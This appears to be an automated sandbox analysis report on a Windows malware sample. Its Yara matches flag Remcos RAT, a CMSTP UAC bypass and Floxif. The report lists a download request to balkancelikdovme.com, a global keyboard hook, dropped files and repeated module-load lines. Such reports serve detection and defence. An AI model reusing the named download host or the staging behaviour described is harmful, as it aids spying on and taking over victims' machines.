Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.browserchoice.eu%s
Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.haosou.com/s?src=win10&ie=utf-8&q=
Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.modern.ie/Umbraco/Api/CompatIssueApi/PostCompatIssue
Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.modern.ie/Umbraco/Api/CompatIssueApi/PostCompatIssue?version=2
Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.modern.ie/umbraco/api/readingviewissues/postreadingviewissue
Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.cn/spartan/ientp?locale%3D%25s%26market%3D%25s%26enableregulatorypsm%3D%25d%26enable
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com&pc=%shttps://www.msn.cn&pc=Z
Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/spartan/ientp?locale%3D%25s%26market%3D%25s%26enableregulatorypsm%3D%25d%26enabl
Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Source: unknown

DNS traffic detected: queries for: balkancelikdovme.com

Source: global traffic	HTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
Source: global traffic	HTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: jp.ask.comit.bing.combr.bing.comask.comcn.bing.comgoogle.com.brgoogle.com.trbing.co.ukbing.co.ingoogle.com.mxgoogle.com.hkgoogle.com.augoogle.com.argoogle.co.jpgoogle.co.ingoogle.comgoogle.co.ukgoogle.itgoogle.esgoogle.frgoogle.deyandex.ruuk.search.yahoo.comgoogle.cagoogle.nlsearch.yahoo.comsearch.yahoo.co.jpfr.search.yahoo.comtw.search.yahoo.comdaum.net10{startIndex{searchTerms{count{outputEncodingUTF-8{startPage{language{ie:maxwidth{ie:sectionheight{inputEncoding{referrer:source{ie:rowheightframeimdockedimtilelargelargeimmersiveimtilesmallhttp://www.linksrow_onecolumnlinksrow_twocolumnsulvfilteredimagetilemetricsulvimagetilemetricsulvmetricsrowsearchrowsuggestionsrow_onecolumnulvsuggestionsControl_PressedControl_HotControl_Enabled0 equals www.yahoo.com (Yahoo)

Source: unknown	HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\colorcpl.exe

Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\colorcpl.exe

Jump to behavior

Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

Source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: DirectDrawCreateEx Callout.

memstr_51aee523-7

Source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_7f63255d-2

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: Detects FloodFix Author: ditekSHen
Source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Floxif Malware Author: Florian Roth
Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects FloodFix Author: ditekSHen
Source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Floxif Malware Author: Florian Roth
Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPED	Matched rule: Detects FloodFix Author: ditekSHen
Source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPED	Matched rule: Detects Floxif Malware Author: Florian Roth
Source: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp, type: DROPPED	Matched rule: Malware - Floxif Author: Florian Roth

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E35A1C	0_3_04E35A1C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E35A1C	0_3_04E35A1C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38CC0	0_3_04E38CC0
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D2C	0_3_04E38D2C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D34	0_3_04E38D34
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E38D3C	0_3_04E38D3C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E35A1C	0_3_04E35A1C
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E39B3A	0_3_04E39B3A
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3DD74	0_3_04E3DD74
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3DD74	0_3_04E3DD74
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3DD74	0_3_04E3DD74

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ?????.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: system.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ?????.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: system.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ?????.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: system.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Section loaded: ???.dll
